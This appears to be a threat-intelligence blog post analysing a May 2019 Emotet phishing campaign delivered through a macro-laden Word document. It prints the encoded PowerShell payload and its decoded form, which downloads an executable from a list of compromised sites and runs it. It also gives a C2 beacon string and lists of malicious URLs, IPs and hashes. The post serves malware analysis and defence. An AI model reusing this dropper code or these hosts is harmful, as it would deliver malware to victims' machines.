Yet Another Emotet Dropper May19

suspicious word doc

Intro

We received another suspicious Phishing Email from cantd@canifa.com at approximately 13:21 Friday 02/05/2019

Email subject:

Payroll

Attachments None, but contained a link to a document(VBA Macro). The A-href was used to mask the actual hosting domain with a fake domain of the target e.g http://security.example.com/…

216937657718.doc
companyname_6006767054US_May_03_2019.doc

When opened the document looks like

emotet word doc

Trying oletools

Using the opensource package oletools we can quickly scan the document(or .pub) for suspicious/malicious calls:

Download oletools

python2 ./olevba.py  ../../word.docm 
olevba 0.54.2 on Python 2.7.16 - http://decalage.info/python/oletools
===============================================================================
FILE: ../../word.docm
Type: OLE
-------------------------------------------------------------------------------
...

JABuADcAOAA5ADAANwA9ACcAYgA0ADIANAAyADYANgA2ACcAOwAkAHAAXwA2ADIAOAA2ACAAPQAgACcANgA4ADUAJwA7ACQAdwAxADcAMgA3ADcAOAA9ACcAdAA4ADcAMgA5ADkAOAAnADsAJABRAF8AXwAwADEANwA2ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHAAXwA2ADIAOAA2ACsAJwAuAGUAeABlACcAOwAkAGIAMgA1ADgAMwAxAD0AJwBvADMANAA1ADEANgAzADEAJwA7ACQAawA5ADMAXwA1ADQAXwA9ACYAKAAnAG4AZQB3AC0AJwArACcAbwBiAGoAZQAnACsAJwBjAHQAJwApACAAbgBlAGAAVAAuAFcARQBgAEIAQwBMAGkARQBuAFQAOwAkAHMAMgAyADcAOAA4ADEAPQAnAGgAdAB0AHAAOgAvAC8AZAB1AGEAbgBsAG8AYwBwAGgAYQB0AHIAZQBzAGkAZABlAG4AYwBlAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBiADgAbwB5AGYAMgBfAHcANwAyADQAcgA1AHUALQA2ADYAMgA1ADMALwBAAGgAdAB0AHAAOgAvAC8AcwB1AHAAZQByAHcAaABpAHQAZQAuAGMAbwBtAC4AYQB1AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvADIAdAA5AHgAXwBiAG0AbwBhAHUAOAA4AHAALQA4ADkANgAwADAANAA5ADYALwBAAGgAdAB0AHAAOgAvAC8AcABuAGUAdQBtAG8AcgBlAGsALgBtAGEALwBjAGEAbABlAG4AZABhAHIALwBFAGMAawBBAHoAdgB2AGwALwBAAGgAdAB0AHAAOgAvAC8AcAB1AHIAZQAtAHYAYQBwAGUAZABpAHMAdAByAGkAYgB1AHQAaQBvAG4ALgBiAGUALwBwADUAMgByAC8AagBzADcANABtAGkAXwB6AGsAMABwADUAbwByAGgAdwBhAC0ANgA1ADEALwBAAGgAdAB0AHAAOgAvAC8AbgBpAHQAaQBuAGMAYQByAGMAYQByAGUALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBCAGIAYQB5AGkAbgBiAFUASwAvACcALgBTAFAAbABpAFQAKAAnAEAAJwApADsAJABJADYAMQAyADIAOQA9ACcAcwA5ADEANgA0ADAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFUAMAAzADcANgAxADUAIABpAG4AIAAkAHMAMgAyADcAOAA4ADEAKQB7AHQAcgB5AHsAJABrADkAMwBfADUANABfAC4AZABPAFcAbgBMAG8AYQBkAEYASQBsAEUAKAAkAFUAMAAzADcANgAxADUALAAgACQAUQBfAF8AMAAxADcANgAxACkAOwAkAEkANAAxADQAMAA3AD0AJwBzADYANgAxADAAMgA0ACcAOwBJAGYAIAAoACgALgAoACcARwBlACcAKwAnAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAUQBfAF8AMAAxADcANgAxACkALgBMAEUAbgBnAHQASAAgAC0AZwBlACAAMgAxADMAMgA0ACkAIAB7AC4AKAAnAEkAbgB2AG8AawBlAC0AJwArACcASQB0AGUAJwArACcAbQAnACkAIAAkAFEAXwBfADAAMQA3ADYAMQA7ACQAWgA5ADIANQBfADcAMAA9ACcAVwAwADQAMAA2ADIAJwA7AGIAcgBlAGEAawA7ACQAdgBfADUANQA3ADcANQA9ACcAUwA4ADIAOAA1AF8ANQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABjADIAOQA1ADYANQA4AD0AJwBtADcAOABfAF8AMQAwACcA

...

Cyberchef recipe to decode the above payload:

CyberChef Recipe decode Emotet

Once decoded, this Powershell payload is much easier to read:

$n78907 = 'b4242666';
 $p_6286 = '685';
 $w172778 = 't872998';
 $Q__01761 = $env:userprofile + '\'+$p_6286+'.exe';
$b25831='o3451631';
$k93_54_=&('new-object') neT.WEBCLiEnT;
$s227881='http://duanlocphatresidence.com/wp-admin/b8oyf2_w724r5u-66253/@http://superwhite.com.au/wp-content/2t9x_bmoau88p-89600496/@http://pneumorek.ma/calendar/EckAzvvl/@http://pure-vapedistribution.be/p52r/js74mi_zk0p5orhwa-651/@http://nitincarcare.com/wp-content/BbayinbUK/'.SPliT('@');
$I61229='s91640';
foreach($U037615 in $s227881){
    try{
        $k93_54_.dOWnLoadFIlE($U037615, $Q__01761);
        $I41407='s661024';
        If ((.('Get-Item') $Q__01761).LEngtH -ge 21324) {
            .('Invoke-Item') $Q__01761;
            $Z925_70='W04062';
            break;
            $v_55775='S8285_5'
        }
    }
    catch{
    }
}
$c295658='m78__10'

The Dropper

The above dropper URLs dropped the following binary that has already been uploaded to VirusTotal and Any.run

The C2 hosted on 82.28.208.186 reported the classic Emotet Signature:

0Zb0PsTNBG33E1=YVbXaXOrLkFbkWI%2FydJ2bVolJaIHbZQVEZ7s7erE4Qmktkv9JavzV9487y%2FTcXv9D7icj192%2FGyEr7kQO8sKSR8bMYIxj%2BPiI7psB1t4XL%2FvwFK%2FTLXvrkTMCB7%2BGBiyCVkcroQFhe%2FKYQR4Bwlp7TOY1DkqfjunnL8uTWWAbT5D%2FyZlAgrCYr6hGx0PCw%2FHxPamAREbSrFuCQ6LBt7GZ61TTg4%2F%2FxwYFZcrEweGN1G9JvE4oILFmHq%2ButhDQix1FXyA7NhaZxyWcWTNO9Y6okafVLZxMo1oytOqCUd0YJkasb35laezPnzyPPSrki3zUojLF%2BjZLmsZHvZGpxBlpDN4Oy5bK0SMun7OmsKnLRpdg8ijWlJ0PEO29Rn1aOhzb2W0fetCcChfmfkB%2B%2BMtpfSYAMQ%3D

We can also use VirusTotal’s new graph feature, to identify additional documents and C2 endpoints

Emotet VT Graph 201905

IoCs

url	http://duanlocphatresidence.com/wp-admin/b8oyf2_w724r5u-66253/	45.252.248.18
url	http://superwhite.com.au/wp-content/2t9x_bmoau88p-89600496/	27.50.89.204
url	http://pneumorek.ma/calendar/EckAzvvl/	88.99.143.205
url	http://pure-vapedistribution.be/p52r/js74mi_zk0p5orhwa-651/	178.32.59.84
url	http://nitincarcare.com/wp-content/BbayinbUK/	103.14.96.71
url	http://82.28.208.186/arizona/jit/	82.28.208.186
url	http://82.28.208.186/entries/ban/ringin/	82.28.208.186
url	http://73.49.109.200:443/entries/	73.49.109.200
url	http://189.183.234.170:50000/arizona/	189.183.234.170
url	http://189.183.234.170/raster	189.183.234.170
url	http://86.122.149.86:8080/window/	86.122.149.86
url	http://190.25.255.98/scripts/loadan	190.25.255.98
hashes	f77b8c61763ed3ea085c6f8addcb8c1f	docm
hashes	db8e8a755667b491373c32ce5a9e81025346fea4	docm
hashes	4221a9922d97fa329b3dbb27e37522448958cbfa186a6ef722e48d63f9753808	docm
hashes	0E9F0C323DEA9C34EEFD5C86B036923A	dropper
hashes	DD825842FBA66E759F76661A4FF0D93861995AE7	dropper
hashes	A4557FD54E922777A7F0F49A206785DA98E984BB63DB86054535FCEE253E2A72	dropper/soundser.exe
vba	Macros/VBA/N6783_85

Share on: